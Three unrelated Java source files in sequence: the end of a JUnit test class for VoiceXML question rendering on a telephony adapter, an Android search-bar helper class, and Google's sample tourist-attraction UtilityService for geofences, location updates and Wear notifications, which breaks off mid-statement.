protected static final String COMMENT_QUESTION_ID = "1";
protected static final String COMMENT_QUESTION_AUDIO = "http://audio.wav";
protected static final String secondRemoteAddress = "0612345678";
@Test
public void renderCommentQuestionTest() throws Exception {
Question question = getCommentQuestion();
AdapterConfig adapter = createBroadsoftAdapter();
Session session = createSession(adapter, remoteAddressVoice);
String result = renderQuestion(question, adapter, remoteAddressVoice, session);
Document doc = getXMLDocumentBuilder(result);
Node vxml = doc.getFirstChild();
Node form = vxml.getFirstChild();
Node block = form.getFirstChild();
Node prompt = block.getFirstChild();
Node _goto = prompt.getNextSibling();
assertNotNull(doc);
assertEquals(doc.getChildNodes().getLength(), 1);
assertEquals(vxml.getNodeName(), "vxml");
assertEquals(form.getNodeName(), "form");
assertEquals(block.getChildNodes().getLength(), 2);
assertEquals(COMMENT_QUESTION_AUDIO, prompt.getFirstChild()
.getAttributes().getNamedItem("src").getNodeValue());
assertEquals("answer?questionId=" + COMMENT_QUESTION_ID + "&sessionKey=" + session.getKey(),
java.net.URLDecoder.decode(_goto.getAttributes().getNamedItem("next").getNodeValue(), "UTF-8"));
assertXMLGeneratedByTwilioLibrary(String.format("<?xml version=\"1.0\" encoding=\"UTF-8\"?><vxml version=\"2.1\" "
+ "xmlns=\"http://www.w3.org/2001/vxml\"><form><block><prompt><audio src=\"%1$s\"/>"
+ "</prompt><goto next=\"answer?questionId=1&sessionKey=%2$s\"/>"
+ "</block></form></vxml>", COMMENT_QUESTION_AUDIO,
URLEncoder.encode(session.getKey(), "UTF-8")), result);
}
@Test
public void renderReferralQuestionTest() throws Exception {
Question question = getReferralQuestion( false, false, false );
AdapterConfig adapter = createBroadsoftAdapter();
Session session = createSession(adapter, remoteAddressVoice);
String result = renderQuestion( question, adapter, remoteAddressVoice, session );
System.out.println("Res: "+result);
String expected = String.format("<?xml version=\"1.0\" encoding=\"UTF-8\"?><vxml version=\"2.1\" xmlns=\"http://www.w3.org/2001/vxml\">"
+ "<form><transfer name=\"thisCall\" dest=\"tel:%s\" bridge=\"true\" connecttimeout=\"40s\">"
+ "<prompt><audio src=\"http://audio.wav\"/></prompt>"
+ "<filled><if cond=\"thisCall=='unknown'\">"
+ "<goto next=\"answer?questionId=%s&sessionKey=%s&callStatus=completed\"/>"
+ "<else/><goto expr=\"'answer?questionId=%s&sessionKey=%s&callStatus=' + thisCall\"/>"
+ "</if></filled></transfer></form></vxml>",
PhoneNumberUtils.formatNumber( remoteAddressVoice, null ),
COMMENT_QUESTION_ID, URLEncoder.encode(session.getKey(), "UTF-8"),
COMMENT_QUESTION_ID, URLEncoder.encode(session.getKey(), "UTF-8"));
assertXMLGeneratedByTwilioLibrary( expected, result );
}
@Test
public void renderMultiReferralQuestionTest() throws Exception {
Question question = getReferralQuestion( false, false, true );
AdapterConfig adapter = createBroadsoftAdapter();
Session session = createSession(adapter, remoteAddressVoice);
String result = renderQuestion( question, adapter, remoteAddressVoice, session );
System.out.println("Res: "+result);
String expected = String.format("<?xml version=\"1.0\" encoding=\"UTF-8\"?><vxml version=\"2.1\" xmlns=\"http://www.w3.org/2001/vxml\">"
+ "<form><transfer name=\"thisCall\" dest=\"tel:%s\" bridge=\"true\" connecttimeout=\"40s\">"
+ "<prompt><audio src=\"http://audio.wav\"/></prompt>"
+ "<filled><if cond=\"thisCall=='unknown'\">"
+ "<goto next=\"answer?questionId=%s&sessionKey=%s&callStatus=completed\"/>"
+ "<else/><goto expr=\"'answer?questionId=%s&sessionKey=%s&callStatus=' + thisCall\"/>"
+ "</if></filled></transfer></form></vxml>",
PhoneNumberUtils.formatNumber( remoteAddressVoice, null ),
COMMENT_QUESTION_ID, URLEncoder.encode(session.getKey(), "UTF-8"),
COMMENT_QUESTION_ID, URLEncoder.encode(session.getKey(), "UTF-8"));
assertXMLGeneratedByTwilioLibrary( expected, result );
}
@Test
public void renderClosedQuestionTest() {
}
@Test
public void renderOpenQuestionWithTypeDTMFTest() throws Exception {
Question question = getOpenDTMFQuestion();
AdapterConfig adapter = createBroadsoftAdapter();
Session session = createSession(adapter, remoteAddressVoice);
String result = renderQuestion(question, adapter, remoteAddressVoice, session);
assertOpenQuestionWithDTMFType( result );
}
@Test
public void renderOpenQuestionWithTypeAudioTest() throws Exception {
Question question = getOpenAudioQuestion();
AdapterConfig adapter = createBroadsoftAdapter();
Session session = createSession(adapter, remoteAddressVoice);
String result = renderQuestion(question, adapter, remoteAddressVoice, session);
TestServlet.logForTest(AdapterType.CALL.toString(), COMMENT_QUESTION_AUDIO);
String expected = String.format("<?xml version=\"1.0\" encoding=\"UTF-8\"?><vxml version=\"2.1\" xmlns=\"http://www.w3.org/2001/vxml\">"
+ "<form id=\"ComposeMessage\"><record name=\"file\" beep=\"true\" maxtime=\"300s\" dtmfterm=\"true\">"
+ "<prompt timeout=\"5s\"><audio src=\"%1$s\"/></prompt><noinput><prompt><audio src=\"%1$s\"/></prompt>"
+ "</noinput><catch event=\"connection.disconnect.hangup\"><submit next=\"upload?questionId=1&"
+ "amp;sessionKey=%2$s\" namelist=\"file\" method=\"post\" enctype=\"multipart/form-data\"/>"
+ "</catch><filled><submit next=\"upload?questionId=1&sessionKey=%2$s\" namelist=\"file\" "
+ "method=\"post\" enctype=\"multipart/form-data\"/></filled></record></form></vxml>",
COMMENT_QUESTION_AUDIO, URLEncoder.encode(session.getKey(), "UTF-8"));
assertXMLGeneratedByTwilioLibrary(expected, result);
}
/**
 * Check that a session deleted during the hangup event is not
 * restored by the hangup call
 * @throws Exception
 */
@Test
public void sessionRestoreOnHangupTest() throws Exception {
//create an adapter
AdapterConfig adapter = createBroadsoftAdapter();
//create a session
Session session = createSession(adapter, remoteAddressVoice);
VoiceXMLRESTProxy voiceXMLRESTProxy = new VoiceXMLRESTProxy();
voiceXMLRESTProxy.hangup(session);
}
private Question getCommentQuestion() {
Question question = new Question();
question.setQuestion_id(COMMENT_QUESTION_ID);
question.setType("comment");
question.setQuestion_text(COMMENT_QUESTION_AUDIO);
Answer answer = new Answer("http://answer.wav", "/next");
question.setAnswers(new ArrayList<Answer>(Arrays.asList(answer)));
// set the answers in the question
question.generateIds();
return question;
}
private Question getOpenDTMFQuestion() {
Question question = new Question();
question.setQuestion_id(COMMENT_QUESTION_ID);
question.setType( "open" );
question.setQuestion_text(COMMENT_QUESTION_AUDIO);
Answer answer = new Answer("http://answer.wav", "/next");
question.setAnswers(new ArrayList<Answer>(Arrays.asList(answer)));
// set the answers in the question
question.generateIds();
return question;
}
private Question getOpenAudioQuestion() {
Question question = new Question();
question.setQuestion_id(COMMENT_QUESTION_ID);
question.setType( "open" );
question.setQuestion_text(COMMENT_QUESTION_AUDIO);
Answer answer = new Answer("http://answer.wav", "/next");
question.setAnswers(new ArrayList<Answer>(Arrays.asList(answer)));
MediaProperty property = new MediaProperty();
property.setMedium(MediumType.BROADSOFT);
property.addProperty(MediaPropertyKey.TYPE, "AudIO");
question.addMedia_Properties(property);
// set the answers in the question
question.generateIds();
return question;
}
private Question getReferralQuestion( boolean useExternalCallerId, boolean usePreconnect,boolean simultaneousRing ) {
Question question = new Question();
question.setQuestion_id( COMMENT_QUESTION_ID );
question.setType( "referral" );
question.setQuestion_text( COMMENT_QUESTION_AUDIO );
if(simultaneousRing) {
question.setUrl( new ArrayList<String>(Arrays.asList( "tel:" + remoteAddressVoice, "tel:"+secondRemoteAddress)) );
} else {
question.setUrl( "tel:" + remoteAddressVoice );
}
Answer answer1 = new Answer( "http://answer.wav", "/next" );
question.setAnswers( new ArrayList<Answer>( Arrays.asList( answer1 ) ) );
MediaProperty mp = new MediaProperty();
mp.setMedium( MediumType.BROADSOFT );
if ( useExternalCallerId ) {
mp.addProperty( MediaPropertyKey.USE_EXTERNAL_CALLERID, "true" );
}
if ( usePreconnect ) {
mp.addProperty( MediaPropertyKey.USE_PRECONNECT, "true" );
}
question.addMedia_Properties( mp );
// set the answers in the question
question.generateIds();
return question;
}
private String renderQuestion(Question question, AdapterConfig adapter, String remoteID, Session session) throws Exception {
String sessionKey = session != null ? session.getKey() : null;
VoiceXMLRESTProxy servlet = new VoiceXMLRESTProxy();
Return res = servlet.formQuestion(question, adapter.getConfigId(), remoteAddressVoice, null, session);
if (question.getType().equalsIgnoreCase("comment")) {
return servlet.renderComment(res.question, res.prompts, sessionKey);
}
else if (question.getType().equalsIgnoreCase("referral")) {
if (question.getUrl() != null && question.getUrl().size() > 0 && question.getUrl().get(0).startsWith("tel:")) {
return servlet.renderReferralQuestion(question, adapter, remoteID, res, session);
}
}
else if (question.getType().equalsIgnoreCase("open")) {
return servlet.renderOpenQuestion(res.question, res.prompts, sessionKey);
}
else if (question.getType().equalsIgnoreCase("closed")) {
}
return null;
}
/**
 * Asserts that the rendered VoiceXML contains an open question with DTMF input and
 * collects the answer variables declared in the document.
 * @param result the rendered VoiceXML document
 * @return the answerInput, questionId and sessionKey expressions found in the document
 * @throws Exception
 */
protected HashMap<String,String> assertOpenQuestionWithDTMFType( String result ) throws Exception
{
HashMap<String, String> variablesForAnswer = new HashMap<String, String>();
Document doc = getXMLDocumentBuilder( result );
Node vxml = doc.getFirstChild();
Node answerInputNode = vxml.getChildNodes().item( 0 );
Node questionIdNode = vxml.getChildNodes().item( 1 );
Node sessionKeyNode = vxml.getChildNodes().item( 2 );
Node form = vxml.getChildNodes().item( 3 );
Node field = form.getFirstChild();
assertNotNull( doc );
assertEquals( doc.getChildNodes().getLength(), 1 );
assertEquals( vxml.getNodeName(), "vxml" );
assertEquals( "form", form.getNodeName() );
assertEquals( "answerInput", answerInputNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "questionId", questionIdNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "sessionKey", sessionKeyNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "property", field.getNodeName() );
field = form.getChildNodes().item( 1 );
assertEquals( "form", form.getNodeName() );
assertEquals( "answerInput", answerInputNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "questionId", questionIdNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "sessionKey", sessionKeyNode.getAttributes().getNamedItem( "name" ).getNodeValue() );
assertEquals( "field", field.getNodeName() );
assertEquals( 5, field.getChildNodes().getLength() );
if(answerInputNode.getAttributes().getNamedItem( "expr" ) != null)
{
variablesForAnswer.put( "answerInput", answerInputNode.getAttributes().getNamedItem( "expr" ).getNodeValue()
.replace( "'", "" ) );
}
if(questionIdNode.getAttributes().getNamedItem( "expr" ) != null)
{
variablesForAnswer.put( "questionId", questionIdNode.getAttributes().getNamedItem( "expr" ).getNodeValue()
.replace( "'", "" ) );
}
if(sessionKeyNode.getAttributes().getNamedItem( "expr" ) != null)
{
variablesForAnswer.put( "sessionKey", sessionKeyNode.getAttributes().getNamedItem( "expr" ).getNodeValue()
.replace( "'", "" ) );
}
return variablesForAnswer;
}
}
|
|
package com.hkm.advancedtoolbar.V3.layout;
import android.annotation.SuppressLint;
import android.content.Context;
import android.graphics.PorterDuff;
import android.os.Handler;
import android.support.annotation.ColorInt;
import android.support.annotation.ColorRes;
import android.support.annotation.DrawableRes;
import android.support.annotation.Nullable;
import android.support.v4.content.ContextCompat;
import android.support.v7.app.ActionBar;
import android.text.Editable;
import android.text.TextWatcher;
import android.util.Log;
import android.view.KeyEvent;
import android.view.View;
import android.view.animation.Animation;
import android.view.animation.AnimationUtils;
import android.view.inputmethod.EditorInfo;
import android.view.inputmethod.InputMethodManager;
import android.widget.EditText;
import android.widget.ImageView;
import android.widget.RelativeLayout;
import android.widget.TextView;
import com.hkm.advancedtoolbar.R;
/**
* Created by hesk on 16/7/15.
*/
public class SearchCustom<TV extends TextView, EditT extends EditText> implements TextWatcher, TextView.OnEditorActionListener, View.OnClickListener {
private String default_placeholder = "Search on Hypebeast";
private ImageView wrappedSearchCloseBtn, searchMagnifyIcon;
private EditT wrappedEditText;
private commonSearchBarMgr searchListener;
private TV searchTextHint;
private ActionBar control;
private RelativeLayout rl;
private final Runnable fadeInDone = new Runnable() {
@Override
public void run() {
wrappedEditText.setEnabled(true);
wrappedSearchCloseBtn.setEnabled(true);
}
};
private View getview;
private Context mcontext;
public void setCrossColorResId(@ColorRes int color) {
int the_color = ContextCompat.getColor(mcontext, color);
setCrossColor(the_color);
}
public void setCrossColor(@ColorInt int the_color) {
if (wrappedSearchCloseBtn != null && the_color != 0) {
wrappedSearchCloseBtn.setColorFilter(the_color, PorterDuff.Mode.SRC_IN);
}
}
public void setSearchIcon(@DrawableRes int drawable) {
if (searchMagnifyIcon != null && drawable != 0) {
searchMagnifyIcon.setImageResource(drawable);
}
}
public void setSearchArea(@DrawableRes int drawable) {
if (wrappedEditText != null && drawable != 0) {
wrappedEditText.setBackgroundResource(drawable);
}
}
public void setSearchIconColorResId(@ColorRes int color) {
int the_color = ContextCompat.getColor(mcontext, color);
setSearchIconColor(the_color);
}
public void setSearchIconColor(@ColorInt int the_color) {
if (searchMagnifyIcon != null) {
searchMagnifyIcon.setColorFilter(the_color, PorterDuff.Mode.SRC_IN);
}
}
enum behavior {
SHOW_KEYBOARD_BEFORE_ANIMATION,
SHOW_KEYBOARD_AFTER_ANIMATION
}
private behavior keyboard_priority;
public SearchCustom(View getcustomview) {
getview = getcustomview;
wrappedEditText = (EditT) getcustomview.findViewById(R.id.ios_actionbar_wrapped_search);
wrappedEditText.addTextChangedListener(this);
wrappedEditText.setOnEditorActionListener(this);
wrappedSearchCloseBtn = (ImageView) getcustomview.findViewById(R.id.ios_search_close_btn);
searchMagnifyIcon = (ImageView) getcustomview.findViewById(R.id.ios_find_icon);
wrappedSearchCloseBtn.setOnClickListener(this);
wrappedEditText.setEnabled(false);
wrappedSearchCloseBtn.setEnabled(false);
keyboard_priority = behavior.SHOW_KEYBOARD_AFTER_ANIMATION;
rl = (RelativeLayout) getcustomview.findViewById(R.id.ios_layout_wrapper);
rl.setAlpha(0f);
rl.animate().alpha(1f).withEndAction(fadeInDone);
revealWithAnimation(false);
mcontext = getcustomview.getContext();
}
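/*
 * Illustrative wiring from a host Activity (a sketch; "customActionBarView" and
 * "mySearchBarMgr" are placeholders, only the SearchCustom calls come from this class):
 *
 *   SearchCustom<TextView, EditText> search = new SearchCustom<>(customActionBarView);
 *   search.setOnSearchListener(mySearchBarMgr);
 *   search.setSearchPlaceholder("Search");
 */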
@SuppressLint("WrongViewCast")
protected void revealWithAnimation(boolean bool) {
searchTextHint = (TV) getview.findViewById(R.id.ios_hinting);
if (bool) {
final Animation anim = AnimationUtils.loadAnimation(getview.getContext(), R.anim.slidefromright);
anim.setAnimationListener(new Animation.AnimationListener() {
@Override
public void onAnimationStart(Animation animation) {
}
@Override
public void onAnimationEnd(Animation animation) {
showkeyboard();
}
@Override
public void onAnimationRepeat(Animation animation) {
}
});
searchTextHint.setText(default_placeholder);
searchTextHint.startAnimation(anim);
} else {
searchTextHint.setText(default_placeholder);
showkeyboard();
}
}
/**
* Set the search listener to be used on this search
*
* @param searchListener the search listener to be used on this search
*/
public void setOnSearchListener(commonSearchBarMgr searchListener) {
this.searchListener = searchListener;
}
/**
* get the object item in the view
*
* @return the customized edit text field
*/
public EditT getSearchField() {
return wrappedEditText;
}
/**
* @return the current text on the search
*/
public CharSequence getSearchText() {
return wrappedEditText.getText();
}
/**
* Set the search placeholder (hint)
*
* @param placeholder the placeholder
* @see #setSearchPlaceholder(int)
*/
public void setSearchPlaceholder(@Nullable CharSequence placeholder) {
if (placeholder != null)
wrappedEditText.setHint(placeholder);
}
/**
* Set the search placeholder (hint)
*
* @param placeholderRes the placeholder
* @see #setSearchPlaceholder(CharSequence)
*/
public void setSearchPlaceholder(int placeholderRes) {
wrappedEditText.setHint(placeholderRes);
}
protected String getplaccholder() {
return default_placeholder;
}
protected Handler hlr = new Handler();
@Override
public void onTextChanged(CharSequence constraint, int start, int count, int after) {
if (searchListener != null) {
searchListener.onKeySearchLetter(constraint.toString());
return;
}
Log.w(getClass().getName(), "SearchListener == null");
}
@Override
public void onClick(View e) {
if (e.getId() == R.id.ios_search_close_btn) {
if (searchListener != null) {
hidekeyboard();
if (control != null)
control.invalidateOptionsMenu();
searchListener.onRestoreToNormal(control);
}
}
}
public void hidekeyboard() {
hlr.postDelayed(new Runnable() {
@Override
public void run() {
wrappedEditText.setText("");
InputMethodManager m = (InputMethodManager) mcontext.getSystemService(Context.INPUT_METHOD_SERVICE);
m.hideSoftInputFromWindow(wrappedEditText.getWindowToken(), 0);
// imm.toggleSoftInputFromWindow(wrappedEditText.getApplicationWindowToken(), InputMethodManager.SHOW_FORCED, 0);
// imm.showSoftInput(wrappedEditText, 0);
// imm.toggleSoftInput(0, InputMethodManager.HIDE_NOT_ALWAYS);
// wrappedEditText.clearFocus();
}
}, 1);
}
public void showkeyboard() {
hlr.post(new Runnable() {
@Override
public void run() {
InputMethodManager m = (InputMethodManager) mcontext.getSystemService(Context.INPUT_METHOD_SERVICE);
// imm.toggleSoftInputFromWindow(wrappedEditText.getApplicationWindowToken(), InputMethodManager.SHOW_FORCED, 0);
m.toggleSoftInput(InputMethodManager.SHOW_FORCED, 0);
// imm.showSoftInput(wrappedEditText, InputMethodManager.SHOW_IMPLICIT);
// imm.setSoftInputMode(WindowManager.LayoutParams.SOFT_INPUT_STATE_ALWAYS_VISIBLE);
wrappedEditText.requestFocus();
}
});
}
@Override
public void beforeTextChanged(CharSequence constraint, int start, int count, int after) {
}
@Override
public void afterTextChanged(Editable editable) {
if (editable.length() == 0) {
searchTextHint.setText(getplaccholder());
} else {
searchTextHint.setText("");
}
}
@Override
public boolean onEditorAction(TextView textView, int actionId, KeyEvent event) {
if (event != null && event.getAction() != KeyEvent.ACTION_DOWN) {
if (searchListener != null) {
searchListener.onKeySearchLetter(textView.getText().toString());
return true;
}
} else if (actionId == EditorInfo.IME_ACTION_SEARCH
|| event == null
|| event.getKeyCode() == KeyEvent.KEYCODE_ENTER) {
if (searchListener != null) {
InputMethodManager imm = (InputMethodManager) mcontext.getSystemService(Context.INPUT_METHOD_SERVICE);
imm.hideSoftInputFromWindow(textView.getWindowToken(), 0);
searchListener.onKeySearchStartConfirm(textView.getText().toString());
return true;
}
}
Log.w(getClass().getName(), "SearchListener == null");
return false;
}
}
|
|
/*
* Copyright 2015 Google Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.example.android.xyztouristattractions.service;
import android.app.IntentService;
import android.app.Notification;
import android.app.PendingIntent;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.graphics.Bitmap;
import android.location.Location;
import android.support.v4.app.NotificationCompat;
import android.support.v4.app.NotificationManagerCompat;
import android.support.v4.content.LocalBroadcastManager;
import android.util.Log;
import com.bumptech.glide.Glide;
import com.bumptech.glide.load.engine.DiskCacheStrategy;
import com.example.android.xyztouristattractions.R;
import com.example.android.xyztouristattractions.common.Attraction;
import com.example.android.xyztouristattractions.common.Constants;
import com.example.android.xyztouristattractions.common.Utils;
import com.example.android.xyztouristattractions.provider.TouristAttractions;
import com.example.android.xyztouristattractions.ui.DetailActivity;
import com.google.android.gms.common.ConnectionResult;
import com.google.android.gms.common.api.GoogleApiClient;
import com.google.android.gms.location.FusedLocationProviderApi;
import com.google.android.gms.location.Geofence;
import com.google.android.gms.location.GeofencingEvent;
import com.google.android.gms.location.LocationRequest;
import com.google.android.gms.location.LocationServices;
import com.google.android.gms.maps.model.LatLng;
import com.google.android.gms.wearable.DataApi;
import com.google.android.gms.wearable.DataMap;
import com.google.android.gms.wearable.PutDataMapRequest;
import com.google.android.gms.wearable.PutDataRequest;
import com.google.android.gms.wearable.Wearable;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.TimeUnit;
import static com.example.android.xyztouristattractions.provider.TouristAttractions.ATTRACTIONS;
import static com.google.android.gms.location.LocationServices.FusedLocationApi;
import static com.google.android.gms.location.LocationServices.GeofencingApi;
/**
* A utility IntentService, used for a variety of asynchronous background
* operations that do not necessarily need to be tied to a UI.
*/
public class UtilityService extends IntentService {
private static final String TAG = UtilityService.class.getSimpleName();
public static final String ACTION_GEOFENCE_TRIGGERED = "geofence_triggered";
private static final String ACTION_LOCATION_UPDATED = "location_updated";
private static final String ACTION_REQUEST_LOCATION = "request_location";
private static final String ACTION_ADD_GEOFENCES = "add_geofences";
private static final String ACTION_CLEAR_NOTIFICATION = "clear_notification";
private static final String ACTION_CLEAR_REMOTE_NOTIFICATIONS = "clear_remote_notifications";
private static final String ACTION_FAKE_UPDATE = "fake_update";
private static final String EXTRA_TEST_MICROAPP = "test_microapp";
public static IntentFilter getLocationUpdatedIntentFilter() {
return new IntentFilter(UtilityService.ACTION_LOCATION_UPDATED);
}
public static void triggerWearTest(Context context, boolean microApp) {
Intent intent = new Intent(context, UtilityService.class);
intent.setAction(UtilityService.ACTION_FAKE_UPDATE);
intent.putExtra(EXTRA_TEST_MICROAPP, microApp);
context.startService(intent);
}
public static void addGeofences(Context context) {
Intent intent = new Intent(context, UtilityService.class);
intent.setAction(UtilityService.ACTION_ADD_GEOFENCES);
context.startService(intent);
}
public static void requestLocation(Context context) {
Intent intent = new Intent(context, UtilityService.class);
intent.setAction(UtilityService.ACTION_REQUEST_LOCATION);
context.startService(intent);
}
public static void clearNotification(Context context) {
Intent intent = new Intent(context, UtilityService.class);
intent.setAction(UtilityService.ACTION_CLEAR_NOTIFICATION);
context.startService(intent);
}
public static Intent getClearRemoteNotificationsIntent(Context context) {
Intent intent = new Intent(context, UtilityService.class);
intent.setAction(UtilityService.ACTION_CLEAR_REMOTE_NOTIFICATIONS);
return intent;
}
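/*
 * Illustrative usage from UI code (sketch only; "context" and "receiver" are assumed to be
 * supplied by the caller):
 *
 *   UtilityService.addGeofences(context);     // register the attraction geofences
 *   UtilityService.requestLocation(context);  // request a location update
 *   LocalBroadcastManager.getInstance(context).registerReceiver(
 *           receiver, UtilityService.getLocationUpdatedIntentFilter());
 */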
public UtilityService() {
super(TAG);
}
@Override
protected void onHandleIntent(Intent intent) {
String action = intent != null ? intent.getAction() : null;
if (ACTION_ADD_GEOFENCES.equals(action)) {
addGeofencesInternal();
} else if (ACTION_GEOFENCE_TRIGGERED.equals(action)) {
geofenceTriggered(intent);
} else if (ACTION_REQUEST_LOCATION.equals(action)) {
requestLocationInternal();
} else if (ACTION_LOCATION_UPDATED.equals(action)) {
locationUpdated(intent);
} else if (ACTION_CLEAR_NOTIFICATION.equals(action)) {
clearNotificationInternal();
} else if (ACTION_CLEAR_REMOTE_NOTIFICATIONS.equals(action)) {
clearRemoteNotifications();
} else if (ACTION_FAKE_UPDATE.equals(action)) {
LatLng currentLocation = Utils.getLocation(this);
// If location unknown use test city, otherwise use closest city
String city = currentLocation == null ? TouristAttractions.TEST_CITY :
TouristAttractions.getClosestCity(currentLocation);
showNotification(city,
intent.getBooleanExtra(EXTRA_TEST_MICROAPP, Constants.USE_MICRO_APP));
}
}
/**
* Add geofences using Play Services
*/
private void addGeofencesInternal() {
Log.v(TAG, ACTION_ADD_GEOFENCES);
GoogleApiClient googleApiClient = new GoogleApiClient.Builder(this)
.addApi(LocationServices.API)
.build();
// It's OK to use blockingConnect() here as we are running in an
// IntentService that executes work on a separate (background) thread.
ConnectionResult connectionResult = googleApiClient.blockingConnect(
Constants.GOOGLE_API_CLIENT_TIMEOUT_S, TimeUnit.SECONDS);
if (connectionResult.isSuccess() && googleApiClient.isConnected()) {
PendingIntent pendingIntent = PendingIntent.getBroadcast(
this, 0, new Intent(this, UtilityReceiver.class), 0);
GeofencingApi.addGeofences(googleApiClient,
TouristAttractions.getGeofenceList(), pendingIntent);
googleApiClient.disconnect();
} else {
Log.e(TAG, String.format(Constants.GOOGLE_API_CLIENT_ERROR_MSG,
connectionResult.getErrorCode()));
}
}
/**
* Called when a geofence is triggered
*/
private void geofenceTriggered(Intent intent) {
Log.v(TAG, ACTION_GEOFENCE_TRIGGERED);
// Check if geofences are enabled
boolean geofenceEnabled = Utils.getGeofenceEnabled(this);
// Extract the geofences from the intent
GeofencingEvent event = GeofencingEvent.fromIntent(intent);
List<Geofence> geofences = event.getTriggeringGeofences();
if (geofenceEnabled && geofences != null && geofences.size() > 0) {
if (event.getGeofenceTransition() == Geofence.GEOFENCE_TRANSITION_ENTER) {
// Trigger the notification based on the first geofence
showNotification(geofences.get(0).getRequestId(), Constants.USE_MICRO_APP);
} else if (event.getGeofenceTransition() == Geofence.GEOFENCE_TRANSITION_EXIT) {
// Clear notifications
clearNotificationInternal();
clearRemoteNotifications();
}
}
UtilityReceiver.completeWakefulIntent(intent);
}
/**
* Called when a location update is requested
*/
private void requestLocationInternal() {
Log.v(TAG, ACTION_REQUEST_LOCATION);
GoogleApiClient googleApiClient = new GoogleApiClient.Builder(this)
.addApi(LocationServices.API)
.build();
// It's OK to use blockingConnect() here as we are running in an
// IntentService that executes work on a separate (background) thread.
ConnectionResult connectionResult = googleApiClient.blockingConnect(
Constants.GOOGLE_API_CLIENT_TIMEOUT_S, TimeUnit.SECONDS);
if (connectionResult.isSuccess() && googleApiClient.isConnected()) {
Intent locationUpdatedIntent = new Intent(this, UtilityService.class);
locationUpdatedIntent.setAction(ACTION_LOCATION_UPDATED);
// Send last known location out first if available
Location location = FusedLocationApi.getLastLocation(googleApiClient);
if (location != null) {
Intent lastLocationIntent = new Intent(locationUpdatedIntent);
lastLocationIntent.putExtra(
FusedLocationProviderApi.KEY_LOCATION_CHANGED, location);
startService(lastLocationIntent);
}
// Request new location
LocationRequest mLocationRequest = new LocationRequest()
.setPriority(LocationRequest.PRIORITY_BALANCED_POWER_ACCURACY);
FusedLocationApi.requestLocationUpdates(
googleApiClient, mLocationRequest,
PendingIntent.getService(this, 0, locationUpdatedIntent, 0));
googleApiClient.disconnect();
} else {
Log.e(TAG, String.format(Constants.GOOGLE_API_CLIENT_ERROR_MSG,
connectionResult.getErrorCode()));
}
}
/**
* Called when the location has been updated
*/
private void locationUpdated(Intent intent) {
Log.v(TAG, ACTION_LOCATION_UPDATED);
// Extract the new location from the intent
Location location =
intent.getParcelableExtra(FusedLocationProviderApi.KEY_LOCATION_CHANGED);
if (location != null) {
LatLng latLngLocation = new LatLng(location.getLatitude(), location.getLongitude());
// Store in a local preference as well
Utils.storeLocation(this, latLngLocation);
// Send a local broadcast so if an Activity is open it can respond
// to the updated location
LocalBroadcastManager.getInstance(this).sendBroadcast(intent);
}
}
/**
* Clears the local device notification
*/
private void clearNotificationInternal() {
Log.v(TAG, ACTION_CLEAR_NOTIFICATION);
NotificationManagerCompat.from(this).cancel(Constants.MOBILE_NOTIFICATION_ID);
}
/**
* Clears remote device notifications using the Wearable message API
*/
private void clearRemoteNotifications() {
Log.v(TAG, ACTION_CLEAR_REMOTE_NOTIFICATIONS);
GoogleApiClient googleApiClient = new GoogleApiClient.Builder(this)
.addApi(Wearable.API)
.build();
// It's OK to use blockingConnect() here as we are running in an
// IntentService that executes work on a separate (background) thread.
ConnectionResult connectionResult = googleApiClient.blockingConnect(
Constants.GOOGLE_API_CLIENT_TIMEOUT_S, TimeUnit.SECONDS);
if (connectionResult.isSuccess() && googleApiClient.isConnected()) {
// Loop through all nodes and send a clear notification message
Iterator<String> itr = Utils.getNodes(googleApiClient).iterator();
while (itr.hasNext()) {
Wearable.MessageApi.sendMessage(
googleApiClient, itr.next(), Constants.CLEAR_NOTIFICATIONS_PATH, null);
}
googleApiClient.disconnect();
}
}
/**
* Show the notification. Either the regular notification with wearable features
* added to enhance, or trigger the full micro app on the wearable.
*
* @param cityId The city to trigger the notification for
* @param microApp If the micro app should be triggered or just enhanced notifications
*/
private void showNotification(String cityId, boolean microApp) {
List<Attraction> attractions = ATTRACTIONS.get(cityId);
if (microApp) {
// If micro app we first need to transfer some data over
sendDataToWearable(attractions);
}
// The first (closest) tourist attraction
Attraction attraction = attractions.get(0);
// Limit attractions to send
int count = attractions.size() > Constants.MAX_ATTRACTIONS ?
Constants.MAX_ATTRACTIONS : attractions.size();
// Pull down the tourist attraction images from the network and store
HashMap<String, Bitmap> bitmaps = new HashMap<>();
try {
for (int i = 0; i < count; i++) {
bitmaps.put(attractions.get(i).name,
Glide.with(this)
.load(attractions.get(i).imageUrl)
.asBitmap()
.diskCacheStrategy(DiskCacheStrategy.SOURCE)
.into(Constants.WEAR_IMAGE_SIZE, Constants.WEAR_IMAGE_SIZE)
.get());
}
} catch (InterruptedException | ExecutionException e) {
Log.e(TAG, "Error fetching image from network: " + e);
}
// The intent to trigger when the notification is tapped
PendingIntent pendingIntent = PendingIntent.getActivity(this, 0,
DetailActivity.getLaunchIntent(this, attraction.name),
PendingIntent.FLAG_UPDATE_CURRENT);
// The intent to trigger when the notification is dismissed, in this case
// we want to clear remote notifications as well
PendingIntent deletePendingIntent =
PendingIntent.getService(this, 0, getClearRemoteNotificationsIntent(this), 0);
// Construct the main notification
NotificationCompat.Builder builder = new NotificationCompat.Builder(this)
.setStyle(new NotificationCompat.BigPictureStyle()
.bigPicture(bitmaps.get(attraction.name))
.setBigContentTitle(attraction.name)
.setSummaryText(getString(R.string.nearby_attraction))
)
.setLocalOnly(microApp)
.setContentTitle(attraction.name)
.setContentText(getString(R.string.nearby_attraction))
.setSmallIcon(R.drawable.ic_stat_maps_pin_drop)
.setContentIntent(pendingIntent)
